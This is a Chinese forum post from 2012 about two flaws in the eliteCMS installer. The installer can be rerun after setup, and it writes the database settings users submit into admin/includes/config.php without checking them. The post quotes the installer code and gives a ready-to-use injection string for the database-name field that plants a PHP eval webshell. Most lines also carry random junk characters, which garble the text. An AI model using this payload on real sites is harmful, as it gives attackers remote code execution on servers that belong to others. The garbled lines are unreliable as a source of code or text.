eliteCMS的安装程序安装结束后未作锁定,导致黑客可以通过访问安装程序地址进行重复安装9 t' `* s6 o p
$ g- [3 \1 u. H- O% M0 e* b另外一个漏洞是安装程序可以直接写入一句话到admin/includes/config.php2 {% i# `! ]% z& @+ u. f' q% p
我们来看代码:) M7 z* I# o# w$ }- p
: z; W, l: N, @4 j...; @; R9 z% z5 T" G; z
elseif ($_GET['step'] == "4") {+ P7 C" x3 u( I W
$file = "../admin/includes/config.php";
j" T/ J5 ? o- l. d& M $write = "<?php\n";6 P; p e' c2 x, H
$write .= "/**\n";# s+ j& [+ V: k% z2 n
$write .= "*\n";5 V8 }/ n$ K* L
$write .= "*eliteCMS-The LightweightCMS Copyright 2008 elite-graphix.net.\n";
6 O/ c: t& H0 @...略...
- \ h, \( T/ d5 x$ K $write .= "*\n";* E) w: i8 j0 a) U
$write .= "*/\n";
! v: w) S3 G9 ~ P. | $write .= "\n";
8 w8 |7 w* d: c' }% {& ^) a4 X ^+ d $write .= "define(\"DB_SERVER\", \"{$_SESSION['DB_SERVER']}\");\n";
~4 y( P! u1 h $write .= "define(\"DB_NAME\", \"{$_SESSION['DB_NAME']}\");\n";
; Z( t0 E+ ~$ Z $write .= "define(\"DB_USER\", \"{$_SESSION['DB_USER']}\");\n";) p( L! S( o! E: O
$write .= "define(\"DB_PASS\", \"{$_SESSION['DB_PASS']}\");\n";- R4 {* I3 P, [2 @8 d) v
$write .= "\$connection = mysql_connect(DB_SERVER, DB_USER, DB_PASS);\n";
. n( K. g. m/ ]) q( E; e $write .= "if (!\$connection) {\n";
) ~& W# o" V6 R$ g- G $write .= " die(\"Database connection failed\" .mysql_error());\n";2 V4 @) M) E* K% E5 b9 ~
$write .= " \n";
+ l t% t( S; Q# Q2 v* N: q+ [ $write .= "} \n";
+ B& m# f1 Y* I0 o1 E. d& v8 b $write .= "\$db_select = mysql_select_db(DB_NAME, \$connection);\n";
- e5 i; V6 c' X' H7 i $write .= "if (!\$db_select) {\n";3 C; P# x4 m4 X: d% ]" l3 r/ n
$write .= " die(\"Database select failed\" .mysql_error());\n";
4 A( q$ y u8 N3 ~$ o. [ $write .= " \n";
7 ~% X; e7 \( W $write .= "} \n";' w U9 r) s m9 ]5 W! c2 Y; a
$write .= "?>\n";
2 P5 y1 b1 _$ \( e% Z' Y
0 x3 h, O" D3 \. g* o $writer = fopen($file, 'w');
- W8 o; M$ Q6 b+ m) `: ^! g" W `...9 v! g! P9 ~) p) M+ o
0 m9 E/ f" c& S& p在看代码:
! \" y" ?5 c$ Y1 d( N9 [, V1 _
6 W' W5 X& j0 G9 \$_SESSION['DB_SERVER'] = $_POST['DB_SERVER'];9 z5 l1 |; I2 B
$_SESSION['DB_NAME'] = $_POST['DB_NAME'];5 v# e5 J' W$ D4 |
$_SESSION['DB_USER'] = $_POST['DB_USER'];
: ?) m/ L `2 v& X. _$_SESSION['DB_PASS'] = $_POST['DB_PASS'];
/ e; U) g$ y7 d; c 0 S$ _) l9 q. l) H4 Q% P4 B9 H) m
取值未作任何验证( n/ j1 E q. h- ]( {
如果将数据库名POST数据:
7 I" J# v$ R- d2 S$ Q: h - ?3 z( p% W( X, L3 O
"?><?php eval($_POST[c]);?><?php+ _) R' Q1 y* ~
+ f$ |; K; b& F$ R将导致一句话后门写入/admin/includes/config.php
3 }" N! L7 j' I% q P& t |
发表于 2012-11-18 13:59:27
收藏
支持
反对